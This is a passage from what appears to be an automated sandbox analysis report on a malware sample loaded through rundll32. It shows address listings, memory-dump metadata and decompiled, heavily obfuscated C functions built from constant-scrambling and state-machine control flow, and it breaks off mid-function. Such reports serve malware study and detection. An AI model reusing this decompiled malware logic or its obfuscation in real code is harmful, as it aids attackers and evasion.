                                                                                                                      0x002ca50d
                                                                                                                      0x002ca515
                                                                                                                      0x002ca523
                                                                                                                      0x002ca528
                                                                                                                      0x002ca52e
                                                                                                                      0x002ca536
                                                                                                                      0x002ca541
                                                                                                                      0x002ca54c
                                                                                                                      0x002ca557
                                                                                                                      0x002ca55f
                                                                                                                      0x002ca567
                                                                                                                      0x002ca56f
                                                                                                                      0x002ca574
                                                                                                                      0x002ca57c
                                                                                                                      0x002ca584
                                                                                                                      0x002ca591
                                                                                                                      0x002ca592
                                                                                                                      0x002ca596
                                                                                                                      0x002ca59e
                                                                                                                      0x002ca5a6
                                                                                                                      0x002ca5ab
                                                                                                                      0x002ca5b3
                                                                                                                      0x002ca5b7
                                                                                                                      0x002ca5bf
                                                                                                                      0x002ca5d2
                                                                                                                      0x002ca5d9
                                                                                                                      0x002ca5e4
                                                                                                                      0x002ca5ef
                                                                                                                      0x002ca5f6
                                                                                                                      0x002ca601
                                                                                                                      0x002ca60f
                                                                                                                      0x002ca613
                                                                                                                      0x002ca61b
                                                                                                                      0x002ca623
                                                                                                                      0x002ca630
                                                                                                                      0x002ca634
                                                                                                                      0x002ca63c
                                                                                                                      0x002ca644
                                                                                                                      0x002ca654
                                                                                                                      0x002ca659
                                                                                                                      0x002ca65d
                                                                                                                      0x002ca66d
                                                                                                                      0x002ca671
                                                                                                                      0x002ca679
                                                                                                                      0x002ca687
                                                                                                                      0x002ca68c
                                                                                                                      0x002ca690
                                                                                                                      0x002ca69f
                                                                                                                      0x002ca6a2
                                                                                                                      0x002ca6a6
                                                                                                                      0x002ca6ae
                                                                                                                      0x002ca6c4
                                                                                                                      0x002ca6cb
                                                                                                                      0x002ca6d6
                                                                                                                      0x002ca6e1
                                                                                                                      0x002ca6f3
                                                                                                                      0x002ca6f8
                                                                                                                      0x002ca6ff
                                                                                                                      0x002ca70a
                                                                                                                      0x002ca71e
                                                                                                                      0x002ca723
                                                                                                                      0x002ca72a
                                                                                                                      0x002ca735
                                                                                                                      0x002ca74a
                                                                                                                      0x002ca74b
                                                                                                                      0x002ca752
                                                                                                                      0x002ca75d
                                                                                                                      0x002ca768
                                                                                                                      0x002ca773
                                                                                                                      0x002ca77e
                                                                                                                      0x002ca786
                                                                                                                      0x002ca78e
                                                                                                                      0x002ca793
                                                                                                                      0x002ca79b
                                                                                                                      0x002ca7a3
                                                                                                                      0x002ca7ab
                                                                                                                      0x002ca7bb
                                                                                                                      0x002ca7bf
                                                                                                                      0x002ca7c7
                                                                                                                      0x002ca7cf
                                                                                                                      0x002ca7d7
                                                                                                                      0x002ca7df
                                                                                                                      0x002ca7e7
                                                                                                                      0x002ca7ef
                                                                                                                      0x002ca7f7
                                                                                                                      0x002ca805
                                                                                                                      0x002ca809
                                                                                                                      0x002ca811
                                                                                                                      0x002ca81b
                                                                                                                      0x002ca823
                                                                                                                      0x002ca828
                                                                                                                      0x002ca82d
                                                                                                                      0x002ca835
                                                                                                                      0x002ca83d
                                                                                                                      0x002ca845
                                                                                                                      0x002ca84d
                                                                                                                      0x002ca855
                                                                                                                      0x002ca869
                                                                                                                      0x002ca86e
                                                                                                                      0x002ca875
                                                                                                                      0x002ca880
                                                                                                                      0x002ca88f
                                                                                                                      0x002ca892
                                                                                                                      0x002ca896
                                                                                                                      0x002ca89e
                                                                                                                      0x002ca8a6
                                                                                                                      0x002ca8ae
                                                                                                                      0x002ca8c4
                                                                                                                      0x002ca8cb
                                                                                                                      0x002ca8d6
                                                                                                                      0x002ca8e3
                                                                                                                      0x002ca8e6
                                                                                                                      0x002ca8f2
                                                                                                                      0x002ca8fa
                                                                                                                      0x002ca8ff
                                                                                                                      0x002ca903
                                                                                                                      0x002ca90b
                                                                                                                      0x002ca91e
                                                                                                                      0x002ca925
                                                                                                                      0x002ca930
                                                                                                                      0x002ca938
                                                                                                                      0x002ca93d
                                                                                                                      0x002ca945
                                                                                                                      0x002ca94d
                                                                                                                      0x002ca955
                                                                                                                      0x002ca95d
                                                                                                                      0x002ca965
                                                                                                                      0x002ca96d
                                                                                                                      0x002ca97b
                                                                                                                      0x002ca97f
                                                                                                                      0x002ca984
                                                                                                                      0x002ca98c
                                                                                                                      0x002ca994
                                                                                                                      0x002ca99c
                                                                                                                      0x002ca9a4
                                                                                                                      0x002ca9a9
                                                                                                                      0x002ca9b1
                                                                                                                      0x002ca9b9
                                                                                                                      0x002ca9c4
                                                                                                                      0x002ca9cc
                                                                                                                      0x002ca9d7
                                                                                                                      0x002ca9e2
                                                                                                                      0x002ca9ed
                                                                                                                      0x002ca9f8
                                                                                                                      0x002caa00
                                                                                                                      0x002caa0d
                                                                                                                      0x002caa16
                                                                                                                      0x002caa20
                                                                                                                      0x002caa28
                                                                                                                      0x002caa33
                                                                                                                      0x002caa3e
                                                                                                                      0x002caa49
                                                                                                                      0x002caa51
                                                                                                                      0x002caa59
                                                                                                                      0x002caa5e
                                                                                                                      0x002caa66
                                                                                                                      0x002caa79
                                                                                                                      0x002caa80
                                                                                                                      0x002caa8b
                                                                                                                      0x002caa93
                                                                                                                      0x002caa9b
                                                                                                                      0x002caaa3
                                                                                                                      0x002caaab
                                                                                                                      0x002caab3
                                                                                                                      0x002caab8
                                                                                                                      0x002caabc
                                                                                                                      0x002caac4
                                                                                                                      0x002caac9
                                                                                                                      0x002caad1
                                                                                                                      0x002caadf
                                                                                                                      0x002cabe3
                                                                                                                      0x00000000
                                                                                                                      0x002caae5
                                                                                                                      0x002caae5
                                                                                                                      0x002caae7
                                                                                                                      0x002cacbc
                                                                                                                      0x002cacbc
                                                                                                                      0x002cacc2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002caaed
                                                                                                                      0x002cab01
                                                                                                                      0x002cab34
                                                                                                                      0x002cab3b
                                                                                                                      0x002cab40
                                                                                                                      0x002cab44
                                                                                                                      0x002cab56
                                                                                                                      0x002cab9c
                                                                                                                      0x002cabb7
                                                                                                                      0x002cabc0
                                                                                                                      0x002cabcc
                                                                                                                      0x002cabd1
                                                                                                                      0x002cabd6
                                                                                                                      0x002cabdc
                                                                                                                      0x00000000
                                                                                                                      0x002cabdc
                                                                                                                      0x002cabd6
                                                                                                                      0x002caae7
                                                                                                                      0x002cacd2
                                                                                                                      0x002cacd2
                                                                                                                      0x002cabea
                                                                                                                      0x002cac0a
                                                                                                                      0x002cac0f
                                                                                                                      0x002cac13
                                                                                                                      0x002cac25
                                                                                                                      0x002cac65
                                                                                                                      0x002cac76
                                                                                                                      0x002cac7d
                                                                                                                      0x002cac85
                                                                                                                      0x002cac87
                                                                                                                      0x002cac8b
                                                                                                                      0x002cac8f
                                                                                                                      0x002cac96
                                                                                                                      0x002cac97
                                                                                                                      0x002cac98
                                                                                                                      0x002caca6
                                                                                                                      0x002caca7
                                                                                                                      0x002caca8
                                                                                                                      0x002cacaf
                                                                                                                      0x002cacb4
                                                                                                                      0x002cacb7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 7h$;:$E%$FCEF$Xth$8$x
                                                                                                                      • API String ID: 0-4119786196
                                                                                                                      • Opcode ID: c98d2fa78fafc03330562ae8f228e283cb4abe412574e96c1f3e95e1750cf514
                                                                                                                      • Instruction ID: bf8a55e2c79f9a95218fac9cde296c8f9e4a19dbef8c3eef4a134aace420c917
                                                                                                                      • Opcode Fuzzy Hash: c98d2fa78fafc03330562ae8f228e283cb4abe412574e96c1f3e95e1750cf514
                                                                                                                      • Instruction Fuzzy Hash: 55220171509381DFD368CF25C54AA8BFBE2BBC5708F108A1DE2D986261D7B19959CF03
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002D146E Relevance: 9.0, Strings: 7, Instructions: 241COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E002D146E(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				unsigned int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t243;
				void* _t248;
				void* _t253;
				void* _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t298;
				void* _t299;
				signed int* _t301;
				void* _t309;

				_t301 =  &_v104;
				_v4 = 0xac6d1;
				_v4 = _v4 | 0x81c51043;
				_v4 = _v4 ^ 0x81ca09c2;
				_v8 = 0xb8d74f;
				_v8 = _v8 | 0x3a2284f4;
				_v8 = _v8 ^ 0x3ab94f49;
				_v12 = 0x56dc2c;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x0005485d;
				_v20 = 0x903a48;
				_v20 = _v20 ^ 0xb2572448;
				_v20 = _v20 ^ 0xb2cdfeb2;
				_v24 = 0x1df316;
				_v24 = _v24 * 0x26;
				_t271 = __ecx;
				_v24 = _v24 ^ 0x04774828;
				_t298 = 0;
				_v96 = 0x29fbe6;
				_t299 = 0x412d246;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0x40e6;
				_v96 = _v96 + 0xf8d0;
				_v96 = _v96 ^ 0x3f79ed75;
				_v28 = 0x5f5eb9;
				_v28 = _v28 ^ 0x304beccc;
				_v28 = _v28 ^ 0x301ae6f7;
				_v16 = 0x707b25;
				_v16 = _v16 | 0xc66cf16b;
				_v16 = _v16 ^ 0xc674099c;
				_v68 = 0x422c76;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x51e03a27;
				_v68 = _v68 ^ 0x51e925f4;
				_v72 = 0x838679;
				_t273 = 0x50;
				_v72 = _v72 / _t273;
				_t274 = 0xb;
				_v72 = _v72 / _t274;
				_v72 = _v72 ^ 0x0007ebfd;
				_v92 = 0x3398da;
				_t275 = 0x26;
				_v92 = _v92 * 0x6d;
				_v92 = _v92 ^ 0x75ca49c7;
				_v92 = _v92 << 6;
				_v92 = _v92 ^ 0x0c9e0967;
				_v48 = 0x734a11;
				_v48 = _v48 >> 0xa;
				_v48 = _v48 ^ 0x00076871;
				_v52 = 0xdc5b30;
				_v52 = _v52 ^ 0x2a73247b;
				_v52 = _v52 ^ 0x2aa1f0d2;
				_v104 = 0x2f7cf6;
				_v104 = _v104 / _t275;
				_v104 = _v104 * 0x41;
				_v104 = _v104 | 0xaae37d31;
				_v104 = _v104 ^ 0xaaffffad;
				_v56 = 0xefab9e;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x0008ac09;
				_v80 = 0xd17701;
				_t276 = 0x57;
				_v80 = _v80 / _t276;
				_v80 = _v80 + 0xffff6938;
				_v80 = _v80 ^ 0x000bb913;
				_v44 = 0x9eed53;
				_t277 = 0x32;
				_v44 = _v44 * 0x74;
				_v44 = _v44 ^ 0x480bdaeb;
				_v100 = 0xb1cacc;
				_v100 = _v100 ^ 0xb6415150;
				_v100 = _v100 / _t277;
				_t278 = 0x13;
				_v100 = _v100 * 0x1c;
				_v100 = _v100 ^ 0x667becf7;
				_v84 = 0x7272f5;
				_v84 = _v84 | 0x49285dda;
				_v84 = _v84 / _t278;
				_v84 = _v84 ^ 0x03db0e7b;
				_v32 = 0x23e0bb;
				_v32 = _v32 ^ 0xc1a40ef0;
				_v32 = _v32 ^ 0xc18ab8c7;
				_v36 = 0x934e6;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x000f952f;
				_v76 = 0x57f010;
				_t279 = 0x55;
				_v76 = _v76 / _t279;
				_v76 = _v76 | 0x3f39553c;
				_v76 = _v76 ^ 0x3f3ef260;
				_v40 = 0x93d6f8;
				_v40 = _v40 >> 6;
				_v40 = _v40 ^ 0x000a0563;
				_v60 = 0x62e666;
				_v60 = _v60 ^ 0x6bd8a41b;
				_v60 = _v60 * 0x61;
				_v60 = _v60 ^ 0xd19d18b1;
				_v88 = 0xe2190a;
				_v88 = _v88 * 0x56;
				_v88 = _v88 << 0x10;
				_v88 = _v88 * 0x2c;
				_v88 = _v88 ^ 0x1bd8b0be;
				_v64 = 0x7df3ba;
				_v64 = _v64 >> 3;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x0fbc3045;
				goto L1;
				do {
					while(1) {
						L1:
						_t309 = _t299 - 0x5b9992e;
						if(_t309 > 0) {
							break;
						}
						if(_t309 == 0) {
							_t253 = E002C274F();
							_t301 = _t301 - 0xc + 0xc;
							_t299 = 0x4369ff;
							_t298 = _t298 + _t253;
							continue;
						} else {
							if(_t299 == 0x4369ff) {
								_t298 = _t298 + E002BB782(_t271 + 0x1c, _v60, _v88, _v64);
							} else {
								if(_t299 == 0x240c704) {
									_t260 = E002C274F();
									_t301 = _t301 - 0xc + 0xc;
									_t299 = 0x5b9992e;
									_t298 = _t298 + _t260;
									continue;
								} else {
									if(_t299 == 0x412d246) {
										_t299 = 0x80cf0f0;
										continue;
									} else {
										if(_t299 != 0x47dcd1e) {
											goto L17;
										} else {
											_t265 = E002C274F();
											_t301 = _t301 - 0xc + 0xc;
											_t299 = 0x240c704;
											_t298 = _t298 + _t265;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t298;
					}
					if(_t299 == 0x80cf0f0) {
						_t243 = E002BB782(_t271 + 8, _v4, _v8, _v12);
						_t301 =  &(_t301[2]);
						_t299 = 0xe2e5f52;
						_t298 = _t298 + _t243;
						goto L17;
					} else {
						if(_t299 == 0xa9f5c45) {
							_t248 = E002C274F();
							_t301 = _t301 - 0xc + 0xc;
							_t299 = 0x47dcd1e;
							_t298 = _t298 + _t248;
							goto L1;
						} else {
							if(_t299 != 0xe2e5f52) {
								goto L17;
							} else {
								_t270 = E002C274F();
								_t301 = _t301 - 0xc + 0xc;
								_t299 = 0xa9f5c45;
								_t298 = _t298 + _t270;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t299 != 0xe1ba840);
				goto L20;
			}















































                                                                                                                      0x002d146e
                                                                                                                      0x002d1471
                                                                                                                      0x002d147b
                                                                                                                      0x002d1483
                                                                                                                      0x002d148b
                                                                                                                      0x002d1493
                                                                                                                      0x002d149b
                                                                                                                      0x002d14a3
                                                                                                                      0x002d14ab
                                                                                                                      0x002d14b0
                                                                                                                      0x002d14b8
                                                                                                                      0x002d14c0
                                                                                                                      0x002d14c8
                                                                                                                      0x002d14d0
                                                                                                                      0x002d14e1
                                                                                                                      0x002d14e5
                                                                                                                      0x002d14e7
                                                                                                                      0x002d14ef
                                                                                                                      0x002d14f1
                                                                                                                      0x002d14f9
                                                                                                                      0x002d14fe
                                                                                                                      0x002d1503
                                                                                                                      0x002d150b
                                                                                                                      0x002d1513
                                                                                                                      0x002d151b
                                                                                                                      0x002d1523
                                                                                                                      0x002d152b
                                                                                                                      0x002d1533
                                                                                                                      0x002d153b
                                                                                                                      0x002d1543
                                                                                                                      0x002d154b
                                                                                                                      0x002d1553
                                                                                                                      0x002d1558
                                                                                                                      0x002d1560
                                                                                                                      0x002d1568
                                                                                                                      0x002d1576
                                                                                                                      0x002d157b
                                                                                                                      0x002d1585
                                                                                                                      0x002d158a
                                                                                                                      0x002d1590
                                                                                                                      0x002d1598
                                                                                                                      0x002d15a5
                                                                                                                      0x002d15a6
                                                                                                                      0x002d15aa
                                                                                                                      0x002d15b2
                                                                                                                      0x002d15b7
                                                                                                                      0x002d15bf
                                                                                                                      0x002d15c7
                                                                                                                      0x002d15cc
                                                                                                                      0x002d15d4
                                                                                                                      0x002d15dc
                                                                                                                      0x002d15e4
                                                                                                                      0x002d15ec
                                                                                                                      0x002d15fa
                                                                                                                      0x002d1603
                                                                                                                      0x002d1607
                                                                                                                      0x002d160f
                                                                                                                      0x002d1617
                                                                                                                      0x002d161f
                                                                                                                      0x002d1624
                                                                                                                      0x002d162e
                                                                                                                      0x002d163c
                                                                                                                      0x002d1641
                                                                                                                      0x002d1647
                                                                                                                      0x002d1654
                                                                                                                      0x002d165c
                                                                                                                      0x002d1669
                                                                                                                      0x002d166c
                                                                                                                      0x002d1670
                                                                                                                      0x002d1678
                                                                                                                      0x002d1680
                                                                                                                      0x002d1690
                                                                                                                      0x002d1699
                                                                                                                      0x002d169c
                                                                                                                      0x002d16a0
                                                                                                                      0x002d16a8
                                                                                                                      0x002d16b0
                                                                                                                      0x002d16c0
                                                                                                                      0x002d16c4
                                                                                                                      0x002d16cc
                                                                                                                      0x002d16d4
                                                                                                                      0x002d16dc
                                                                                                                      0x002d16e4
                                                                                                                      0x002d16ec
                                                                                                                      0x002d16f1
                                                                                                                      0x002d16f9
                                                                                                                      0x002d1705
                                                                                                                      0x002d1708
                                                                                                                      0x002d170c
                                                                                                                      0x002d1714
                                                                                                                      0x002d171c
                                                                                                                      0x002d1724
                                                                                                                      0x002d1729
                                                                                                                      0x002d1731
                                                                                                                      0x002d1739
                                                                                                                      0x002d1746
                                                                                                                      0x002d174a
                                                                                                                      0x002d1752
                                                                                                                      0x002d175f
                                                                                                                      0x002d1763
                                                                                                                      0x002d176d
                                                                                                                      0x002d1771
                                                                                                                      0x002d1779
                                                                                                                      0x002d1781
                                                                                                                      0x002d1786
                                                                                                                      0x002d178b
                                                                                                                      0x002d178b
                                                                                                                      0x002d1793
                                                                                                                      0x002d1793
                                                                                                                      0x002d1793
                                                                                                                      0x002d1793
                                                                                                                      0x002d1795
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002d179b
                                                                                                                      0x002d1824
                                                                                                                      0x002d1829
                                                                                                                      0x002d182c
                                                                                                                      0x002d1831
                                                                                                                      0x00000000
                                                                                                                      0x002d179d
                                                                                                                      0x002d17a3
                                                                                                                      0x002d18e1
                                                                                                                      0x002d17a9
                                                                                                                      0x002d17af
                                                                                                                      0x002d1803
                                                                                                                      0x002d1808
                                                                                                                      0x002d180b
                                                                                                                      0x002d180d
                                                                                                                      0x00000000
                                                                                                                      0x002d17b1
                                                                                                                      0x002d17b7
                                                                                                                      0x002d17e9
                                                                                                                      0x00000000
                                                                                                                      0x002d17b9
                                                                                                                      0x002d17bf
                                                                                                                      0x00000000
                                                                                                                      0x002d17c5
                                                                                                                      0x002d17d8
                                                                                                                      0x002d17dd
                                                                                                                      0x002d17e0
                                                                                                                      0x002d17e5
                                                                                                                      0x00000000
                                                                                                                      0x002d17e5
                                                                                                                      0x002d17bf
                                                                                                                      0x002d17b7
                                                                                                                      0x002d17af
                                                                                                                      0x002d17a3
                                                                                                                      0x002d18e3
                                                                                                                      0x002d18ec
                                                                                                                      0x002d18ec
                                                                                                                      0x002d183e
                                                                                                                      0x002d18ad
                                                                                                                      0x002d18b2
                                                                                                                      0x002d18b5
                                                                                                                      0x002d18ba
                                                                                                                      0x00000000
                                                                                                                      0x002d1840
                                                                                                                      0x002d1846
                                                                                                                      0x002d188a
                                                                                                                      0x002d188f
                                                                                                                      0x002d1892
                                                                                                                      0x002d1897
                                                                                                                      0x00000000
                                                                                                                      0x002d1848
                                                                                                                      0x002d184e
                                                                                                                      0x00000000
                                                                                                                      0x002d1850
                                                                                                                      0x002d1863
                                                                                                                      0x002d1868
                                                                                                                      0x002d186b
                                                                                                                      0x002d1870
                                                                                                                      0x00000000
                                                                                                                      0x002d1870
                                                                                                                      0x002d184e
                                                                                                                      0x002d1846
                                                                                                                      0x00000000
                                                                                                                      0x002d18bc
                                                                                                                      0x002d18bc
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %{p$':Q$<U9?$fb$uy?${$s*$4
                                                                                                                      • API String ID: 0-3558008229
                                                                                                                      • Opcode ID: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction ID: 13e0fc8fddd54d1d6b9adbc24ab2554d40c5b687b082d5cddca6e83edab5458e
                                                                                                                      • Opcode Fuzzy Hash: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction Fuzzy Hash: 41B143729183819FC348DF69D48A40BFBF1BBD4348F104A2EF4959A220D7B4DA58CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B194C Relevance: 9.0, Strings: 7, Instructions: 223COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 78%
                                                                                                                      			E002B194C(void* __ecx, signed int __edx, void* __edi, void* __eflags, signed int _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr _v156;
				char _v176;
				short _v720;
				short _v722;
				char _v724;
				signed int _v768;
				char _v1288;
				char _v1808;
				void* _t336;
				signed int _t361;
				intOrPtr _t370;
				void* _t373;
				signed int _t379;
				signed int _t394;
				void* _t407;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				void* _t434;
				void* _t435;
				void* _t436;

				_t394 = __edx ^  *(__edi + 3);
				asm("int 0x55");
				_t435 = _t434 - 0x710;
				_t370 = _a8;
				_push(__edi);
				_push(_a20);
				if(__eflags == 0) {
					_push(_a16);
					_push(_a12);
					_push(_t370);
					_push(_a4);
					_push(_t394);
					_push(__ecx);
					E002BCF25(_t336);
					_v16 = 0x6f572e;
				}
				_t436 = _t435 + 0x1c;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 + 0xd52f;
				_t373 = 0x80f983c;
				_v16 = _v16 ^ 0x3310f03a;
				_v16 = _v16 ^ 0x33101333;
				_v60 = 0xed71dd;
				_v60 = _v60 ^ 0x2497a453;
				_t422 = 0x26;
				_v60 = _v60 * 0x72;
				_v60 = _v60 ^ 0x3eb60fda;
				_v112 = 0xa5b0b2;
				_v112 = _v112 + 0x8954;
				_v112 = _v112 ^ 0x00ada628;
				_v108 = 0xe5587e;
				_v108 = _v108 << 9;
				_v108 = _v108 ^ 0xcab3bbf0;
				_v92 = 0x4845fb;
				_v92 = _v92 + 0x365f;
				_v92 = _v92 + 0xdd1a;
				_v92 = _v92 ^ 0x004e95c0;
				_v88 = 0xa51f24;
				_v88 = _v88 ^ 0x4dc3992d;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x002183c7;
				_v28 = 0x92b1f2;
				_v28 = _v28 + 0xdb28;
				_v28 = _v28 ^ 0xc5c4fb2d;
				_v28 = _v28 + 0xffff07a3;
				_v28 = _v28 ^ 0xc5543e55;
				_v56 = 0x45fcf7;
				_v56 = _v56 ^ 0x18f8a820;
				_v56 = _v56 / _t422;
				_v56 = _v56 ^ 0x00a79737;
				_v72 = 0xd5567a;
				_v72 = _v72 ^ 0x96c46f64;
				_v72 = _v72 + 0x1123;
				_v72 = _v72 ^ 0x96131221;
				_v128 = 0xd7fcd2;
				_v128 = _v128 | 0x19fc7ba7;
				_v128 = _v128 ^ 0x19f2013f;
				_v36 = 0xb63dda;
				_v36 = _v36 | 0x57c3443c;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x000375d9;
				_v120 = 0x9784e5;
				_v120 = _v120 ^ 0x5442b457;
				_v120 = _v120 ^ 0x54d2e3fe;
				_v152 = 0x86b47c;
				_v152 = _v152 | 0x1a648f0d;
				_v152 = _v152 ^ 0x1ae2f95e;
				_v104 = 0xe16033;
				_v104 = _v104 + 0xffff0503;
				_v104 = _v104 ^ 0x00e7872e;
				_v140 = 0x7ced29;
				_v140 = _v140 + 0x937a;
				_v140 = _v140 ^ 0x00718bd8;
				_v148 = 0xa848b7;
				_v148 = _v148 ^ 0xa8d47762;
				_v148 = _v148 ^ 0xa87b6210;
				_v124 = 0xc4055c;
				_v124 = _v124 << 5;
				_v124 = _v124 ^ 0x1882bddf;
				_v80 = 0x58e97;
				_t423 = 0x7c;
				_v80 = _v80 / _t423;
				_v80 = _v80 + 0xffff9366;
				_v80 = _v80 ^ 0xfffe01cd;
				_v48 = 0x77db93;
				_t424 = 0x3a;
				_v48 = _v48 / _t424;
				_v48 = _v48 + 0xffffa5b4;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x00036e08;
				_v132 = 0x4854bc;
				_t425 = 0x4c;
				_v132 = _v132 * 0x24;
				_v132 = _v132 ^ 0x0a23127f;
				_v84 = 0x297997;
				_v84 = _v84 / _t425;
				_t426 = 0x45;
				_v84 = _v84 * 0x5e;
				_v84 = _v84 ^ 0x003e8360;
				_v24 = 0xba7a12;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x8e2fa782;
				_v24 = _v24 + 0xffffcaa3;
				_v24 = _v24 ^ 0xfad920cc;
				_v64 = 0xf87d94;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 4;
				_v64 = _v64 ^ 0x0002c2de;
				_v68 = 0x627eea;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 | 0x4b478a8f;
				_v68 = _v68 ^ 0x4b4b50ae;
				_v32 = 0x4d9af3;
				_v32 = _v32 + 0xffff3fdf;
				_v32 = _v32 | 0x07023235;
				_v32 = _v32 ^ 0xa9cb8ace;
				_v32 = _v32 ^ 0xae825d6e;
				_v144 = 0x2c231c;
				_v144 = _v144 ^ 0x372f588c;
				_v144 = _v144 ^ 0x37050cc1;
				_v40 = 0xed36d5;
				_v40 = _v40 / _t426;
				_v40 = _v40 + 0xffff2e56;
				_v40 = _v40 * 0xd;
				_v40 = _v40 ^ 0x002f5a10;
				_v20 = 0xb226b9;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x7ec33512;
				_v20 = _v20 ^ 0x86eef9df;
				_v20 = _v20 ^ 0xee6f0a5e;
				_v76 = 0xa2d2;
				_v76 = _v76 + 0xffff2403;
				_v76 = _v76 + 0xffff5c56;
				_v76 = _v76 ^ 0xfff84be5;
				_v12 = 0x61529e;
				_v12 = _v12 + 0x826f;
				_v12 = _v12 | 0x315ab852;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x0008d08d;
				_v136 = 0xbe89c0;
				_v136 = _v136 ^ 0x9f3b785a;
				_v136 = _v136 ^ 0x9f8a2ffd;
				_v116 = 0x9615af;
				_v116 = _v116 | 0x7dcb4113;
				_v116 = _v116 ^ 0x7dd5a359;
				_v100 = 0x787e8d;
				_t427 = 0xf;
				_v100 = _v100 * 0x78;
				_v100 = _v100 ^ 0x3874d75c;
				_v96 = 0xce992e;
				_v96 = _v96 << 9;
				_v96 = _v96 | 0x5045bce0;
				_v96 = _v96 ^ 0xdd755c45;
				_v52 = 0xe3c541;
				_t419 = _v100;
				_v52 = _v52 / _t427;
				_v52 = _v52 + 0xffff4fb9;
				_v52 = _v52 | 0x0dbfd8b3;
				_v52 = _v52 ^ 0x0db5e533;
				_v44 = 0xd3f0eb;
				_v44 = _v44 | 0x02fbd4da;
				_v44 = _v44 >> 6;
				_v44 = _v44 + 0xffffa89e;
				_v44 = _v44 ^ 0x000772a1;
				while(1) {
					L6:
					_t407 = 0x2e;
					L7:
					while(_t373 != 0xcf103a) {
						if(_t373 == 0x80f983c) {
							_v156 = _t370;
							_t373 = 0xcf103a;
							continue;
						} else {
							if(_t373 == 0x8bdeaee) {
								__eflags = _v768 & _v16;
								if(__eflags == 0) {
									_t361 = _a16( &_v768,  &_v176);
									asm("sbb ecx, ecx");
									_t379 =  ~_t361 & 0x01058edd;
									goto L14;
								} else {
									__eflags = _v724 - _t407;
									if(_v724 != _t407) {
										L23:
										__eflags = _a4;
										if(__eflags != 0) {
											_push(_v48);
											_push(_v80);
											_push(0x2b1264);
											E002BE7CE(E002BAB66(_v148, _v124, __eflags), __eflags, _v132, _t370, _v148, _v84, _v24, _v64, _v68,  &_v724);
